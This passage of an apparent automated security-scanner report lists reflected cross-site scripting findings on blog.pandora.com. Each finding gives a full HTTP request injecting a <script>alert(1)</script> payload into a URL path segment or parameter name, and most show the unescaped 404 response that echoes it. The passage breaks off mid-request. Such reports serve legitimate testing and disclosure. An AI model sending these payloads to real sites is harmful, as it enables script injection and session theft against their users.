Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora4fa26<script>alert(1)</script>ccd92788417/archives/washington/ was not found on this server.</p>
...[SNIP]...

3.435. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/washington/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bb0a1<script>alert(1)</script>2021562e58c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbb0a1<script>alert(1)</script>2021562e58c/washington/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbb0a1<script>alert(1)</script>2021562e58c/washington/ was not found on this server.</p>
...[SNIP]...

3.436. http://blog.pandora.com/pandora/archives/washington/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/washington/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2316c<script>alert(1)</script>13ece1ff165 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/washington2316c<script>alert(1)</script>13ece1ff165/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/washington2316c<script>alert(1)</script>13ece1ff165/ was not found on this server.</p>
...[SNIP]...

3.437. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/North

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da3b3<script>alert(1)</script>63dacbe980f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorada3b3<script>alert(1)</script>63dacbe980f/assets_c/2010/11/North HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorada3b3<script>alert(1)</script>63dacbe980f/assets_c/2010/11/North was not found on this server.</p>
...[SNIP]...

3.438. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/North

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3aeff<script>alert(1)</script>0e35543ed97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/assets_c3aeff<script>alert(1)</script>0e35543ed97/2010/11/North HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c3aeff<script>alert(1)</script>0e35543ed97/2010/11/North was not found on this server.</p>
...[SNIP]...

3.439. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/North

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9922b<script>alert(1)</script>9d05ca919c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/assets_c/20109922b<script>alert(1)</script>9d05ca919c3/11/North HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/20109922b<script>alert(1)</script>9d05ca919c3/11/North was not found on this server.</p>
...[SNIP]...

3.440. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/North

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7cce4<script>alert(1)</script>41d4a417f15 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/assets_c/2010/117cce4<script>alert(1)</script>41d4a417f15/North HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:44 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/117cce4<script>alert(1)</script>41d4a417f15/North was not found on this server.</p>
...[SNIP]...

3.441. http://blog.pandora.com/pandora/assets_c/2010/11/North [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/North

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b0096<script>alert(1)</script>86b16cd0066 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/assets_c/2010/11/Northb0096<script>alert(1)</script>86b16cd0066 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/11/Northb0096<script>alert(1)</script>86b16cd0066 was not found on this server.</p>
...[SNIP]...

3.442. http://blog.pandora.com/pandora/assets_c/2010/11/North [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/North

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload def5f<script>alert(1)</script>cbc7e5829ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/assets_c/2010/11/North?def5f<script>alert(1)</script>cbc7e5829ba=1 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 357

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/11/North?def5f<script>alert(1)</script>cbc7e5829ba=1 was not found on this server.</p>
...[SNIP]...

3.443. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/sd

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75284<script>alert(1)</script>22efa64e34f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora75284<script>alert(1)</script>22efa64e34f/assets_c/2010/11/sd HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora75284<script>alert(1)</script>22efa64e34f/assets_c/2010/11/sd was not found on this server.</p>
...[SNIP]...

3.444. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/sd

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1e532<script>alert(1)</script>7e0d5f16878 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/assets_c1e532<script>alert(1)</script>7e0d5f16878/2010/11/sd HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c1e532<script>alert(1)</script>7e0d5f16878/2010/11/sd was not found on this server.</p>
...[SNIP]...

3.445. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/sd

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b1697<script>alert(1)</script>1beb0083bf8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/assets_c/2010b1697<script>alert(1)</script>1beb0083bf8/11/sd HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:40 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010b1697<script>alert(1)</script>1beb0083bf8/11/sd was not found on this server.</p>
...[SNIP]...

3.446. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/sd

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2be7b<script>alert(1)</script>5fa8c585472 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/assets_c/2010/112be7b<script>alert(1)</script>5fa8c585472/sd HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/112be7b<script>alert(1)</script>5fa8c585472/sd was not found on this server.</p>
...[SNIP]...

3.447. http://blog.pandora.com/pandora/assets_c/2010/11/sd [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/sd

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ad328<script>alert(1)</script>2f7a6237729 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/assets_c/2010/11/sdad328<script>alert(1)</script>2f7a6237729 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/11/sdad328<script>alert(1)</script>2f7a6237729 was not found on this server.</p>
...[SNIP]...

3.448. http://blog.pandora.com/pandora/assets_c/2010/11/sd [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/assets_c/2010/11/sd

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a53ff<script>alert(1)</script>c919746079d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/assets_c/2010/11/sd?a53ff<script>alert(1)</script>c919746079d=1 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:27 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 354

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/assets_c/2010/11/sd?a53ff<script>alert(1)</script>c919746079d=1 was not found on this server.</p>
...[SNIP]...

3.449. http://blog.pandora.com/pandora/index.xml [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/index.xml

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c1c19<script>alert(1)</script>6a443b18f71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorac1c19<script>alert(1)</script>6a443b18f71/index.xml HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 341

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorac1c19<script>alert(1)</script>6a443b18f71/index.xml was not found on this server.</p>
...[SNIP]...

3.450. http://blog.pandora.com/pandora/index.xml [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/index.xml

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d1051<script>alert(1)</script>6df0b546c02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/index.xmld1051<script>alert(1)</script>6df0b546c02 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 341

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/index.xmld1051<script>alert(1)</script>6df0b546c02 was not found on this server.</p>
...[SNIP]...

3.451. http://blog.pandora.com/pandora/jquery.dimension.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/jquery.dimension.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2b6f7<script>alert(1)</script>7fd9127d43b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora2b6f7<script>alert(1)</script>7fd9127d43b/jquery.dimension.js HTTP/1.1
Host: blog.pandora.com
Proxy-Connection: keep-alive
Referer: http://blog.pandora.com/pandora/
Accept: */*
